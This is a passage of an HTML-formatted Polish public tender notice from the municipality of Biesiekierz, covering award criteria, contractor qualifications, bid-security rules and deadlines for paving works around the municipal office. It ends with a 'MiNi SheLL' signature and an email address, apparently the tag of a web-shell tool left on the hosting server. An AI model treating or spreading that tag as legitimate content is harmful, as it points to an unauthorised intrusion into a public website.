pkt<br/>skrócenie terminu realizacji przedmiotu zamówienia o miesiąc, tj. realizacja przedmiotu zamówienia w<br/>terminie 2 miesięcy od dnia zawarcia umowy – 20 pkt<br/><br/>Łączna liczba punktów za ofertę = liczba punktów za cenę brutto (maks. 60) + liczba punktów za<br/>przedłużenie terminu gwarancji (maks. 20) + liczba punktów za skrócenie terminu realizacji zamówienia<br/>(maks. 20)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Przedłużenie terminu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Skrócenie terminu realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, Zamawiający określa warunki udziału w postępowaniu<br/>dotyczące zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub<br/>zawodowej, jeżeli Wykonawca wykaże, że wykonał należycie w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, co najmniej jedno zadanie obejmujące swoim rodzajem i wartością robotom<br/>budowlanym stanowiącym przedmiot zamówienia, tj. wykonał co najmniej 1 robotę budowlaną<br/>polegającą na wykonaniu utwardzenia nawierzchni poprzez ułożenie kostki brukowej betonowej<br/>o powierzchni co najmniej 400 m2 lub o wartości min. 150.000 zł brutto.<br/>W przypadku, gdy wartość wykazywanego zamówienia określona została w walucie innej niż<br/>wskazana przez Zamawiającego, Wykonawca przeliczy ją według średniego kursu NBP na<br/>dzień zatwierdzenia protokołu odbioru robót lub równoważnego dokumentu, podając datę<br/>zatwierdzenia protokołu/ dokumentu i kurs walut.<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie<br/>dokumentów wyszczególnionych w punkcie Rozdziale II ust. 9 SWZ, na zasadzie spełnia/nie<br/>spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem<br/>najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących<br/>podmiotowych środków dowodowych:<br/>a) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju i wartości, daty i miejsca wykonania i podmiotów, na rzecz których roboty te<br/>zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym, czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty wystawione przez podmiot na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych<br/>dokumentów – inne dokumenty, o treści zgodnej z załączonym wzorem, stanowiącym załącznik nr 3 do<br/>SWZ i zgodnie z wymaganiami określonymi w Rozdziale II ust. 7 pkt 4 SWZ.<br/>Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>zamawiający posiada, jeżeli wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.<br/>Wykonawca składa podmiotowe środki dowodowe aktualne na dzień ich złożenia.<br/>Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia Wykonawca składa, pod<br/>rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) Pełnomocnictwo<br/> Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, Wykonawca,<br/>który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument<br/>pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia<br/>oferty i podpisania umowy.<br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego<br/>będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych<br/>Wykonawców należy załączyć do oferty.<br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności<br/>wskazanie:<br/>• postępowania o zamówienie publiczne, którego dotyczy,<br/>• wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z<br/>nazwy z określeniem adresu siedziby,<br/>• ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>b) Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden<br/>spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z<br/>którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane. W takiej sytuacji Wykonawcy są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególni Wykonawcy.<br/>c) Zobowiązanie podmiotu trzeciego<br/>Zobowiązanie podmiotu udostępniającego zasoby lub inny podmiotowy środek dowodowy<br/>potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje<br/>rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/> zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/> czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których<br/>wskazane zdolności dotyczą.<br/>d) Wadium - Wymagana forma:<br/> Wniesienie wadium w poręczeniach lub gwarancjach powinno obejmować przekazanie tego<br/>dokumentu w takiej formie, w jakiej został on ustanowiony przez gwaranta, tj. oryginału<br/>dokumentu podpisanego kwalifikowanym podpisem elektronicznym przez jego wystawcę.<br/> Zamawiający zaleca załączenie do oferty dokumentu potwierdzającego wniesienie wadium w<br/>pieniądzu na rachunek bankowy Zamawiającego. Czynność ta skróci czas badania ofert.<br/>e) Wykaz rozwiązań równoważnych – Wykonawca, który powołuje się na rozwiązania<br/>równoważne, jest zobowiązany wykazać, że oferowane przez niego rozwiązanie spełnia<br/>wymagania określone przez Zamawiającego. W takim przypadku Wykonawca załącza do oferty<br/>wykaz rozwiązań równoważnych z jego opisem lub normami.<br/>f) Zastrzeżenie tajemnicy przedsiębiorstwa – w sytuacji, gdy oferta lub inne dokumenty składane<br/>w toku postępowania będą zawierały tajemnicę przedsiębiorstwa, wykonawca, wraz z<br/>przekazaniem takich informacji, zastrzega, że nie mogą być one udostępniane, oraz wykazuje,<br/>że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy<br/>z 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1) Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu<br/>składania ofert, wnieść wadium w kwocie 4.000,00 zł (słownie: cztery tysiące zł 00/100).<br/>2) Wadium musi obejmować pełen okres związania ofertą.<br/>3) Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy<br/>Pzp.<br/>4) Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy numer 03<br/>8562 0007 0022 0365 2000 0140 tytułem:<br/>Zagospodarowanie przestrzeni publicznej wokół Urzędu Gminy w Biesiekierzu<br/>5) Wadium musi wpłynąć na wskazany rachunek bankowy Zamawiającego najpóźniej przed<br/>upływem terminu składania ofert (decyduje data wpływu na rachunek bankowy Zamawiającego).<br/>6) Wadium wnoszone w formie poręczeń lub gwarancji należy załączyć do oferty w oryginale w<br/>postaci elektronicznej oraz powinno zawierać:<br/>- nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego),<br/>gwaranta/poręczyciela oraz wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub<br/>poręczeniu musi być Gmina Biesiekierz, 76 – 039 Biesiekierz 103, NIP 4990527492,<br/>- określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>- kwotę gwarancji/poręczenia,<br/>- termin ważności gwarancji/poręczenia,<br/>- zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na<br/>pierwsze pisemne żądanie zamawiającego, w sytuacjach określonych w art. 98 ust. 6 ustawy<br/>Pzp.<br/>7) W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie<br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o<br/>zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, Zamawiający<br/>odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8) Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>9) Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego,<br/>b) wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z<br/>pełnomocnikiem,<br/>c) każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykazuje<br/>samodzielnie brak podstaw do wykluczenia, o których mowa w pkt 3 lit. b powyżej. Oświadczenie<br/>o spełnieniu warunków udziału w postępowaniu oraz braku podstaw do wykluczenia składa<br/>każdy z Wykonawców,<br/>d) warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej (o ile został przewidziany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp,<br/>zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia<br/>są wymagane,<br/>e) w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia (o ile zostały przewidziane) – Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane,<br/>f) w przypadku, o którym mowa w lit. d i e powyżej, Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiany w umowie mogą dotyczyć:<br/>1) zmiany terminu wykonania zamówienia,<br/>2) zmiany wynagrodzenia w zakresie określonym w ust. 9,<br/>3) zmiany w zakresie podwykonawstwa, szczegółowo opisana w § 8 Umowy,<br/>4) zmian rozwiązań technicznych lub technologicznych,<br/>5) zmian sposobu wykonania przedmiotu Umowy,<br/>6) zmiany producenta materiałów budowlanych, urządzeń,<br/>7) zmiany wymiarów, położenia lub wysokości części robót budowlanych,<br/>8) zmiany kierownika budowy lub robót.<br/>Wszelkie zmiany Umowy wymagają uprzedniej pisemnej akceptacji i jeżeli dotyczą one istotnych<br/>zmian Umowy muszą być sporządzone w formie pisemnego aneksu, pod rygorem nieważności.<br/>Szczegółowe zasady wprowadzenia zmian w umowie zawiera załącznik nr 5 do SWZ - wzór<br/>umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-01 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem MiniPortalu. Sposób złożenia oferty, w tym zaszyfrowania oferty opisany został w „Instrukcji użytkownika”, dostępnej na stronie: https://miniportaluzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-01 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-30</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający poinformuje Wykonawcę, któremu zostanie udzielone zamówienie, o miejscu i<br/>terminie zawarcia umowy.<br/>2) Wykonawca przed zawarciem umowy:<br/>- poda wszelkie informacje niezbędne do wypełnienia treści umowy na wezwanie<br/>Zamawiającego,<br/>- wniesie zabezpieczenie należytego wykonania umowy.<br/>3) Najpóźniej w dniu podpisania umowy Wykonawca jest zobowiązany dostarczyć<br/>Zamawiającemu kopię dokumentu potwierdzającego kwalifikacje kierownika robót.<br/>4) Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia<br/>publicznego kopii umowy regulującej współpracę tych Wykonawców, w której m.in. zostanie<br/>określony pełnomocnik uprawniony do kontaktów z Zamawiającym oraz do wystawiania<br/>dokumentów związanych z płatnościami, przy czym termin, na jaki została zawarta umowa, nie<br/>może być krótszy niż termin realizacji zamówienia.<br/>5) Niedopełnienie powyższych formalności przez wybranego Wykonawcę będzie potraktowane<br/>przez Zamawiającego jako niemożność zawarcia umowy w sprawie zamówienia publicznego z<br/>przyczyn leżących po stronie Wykonawcy i zgodnie z art. 98 ust. 6 pkt 3 ustawy Pzp, będzie skutkowało zatrzymaniem przez Zamawiającego wadium wraz z odsetkami.

Creat By MiNi SheLL
Email: jattceo@gmail.com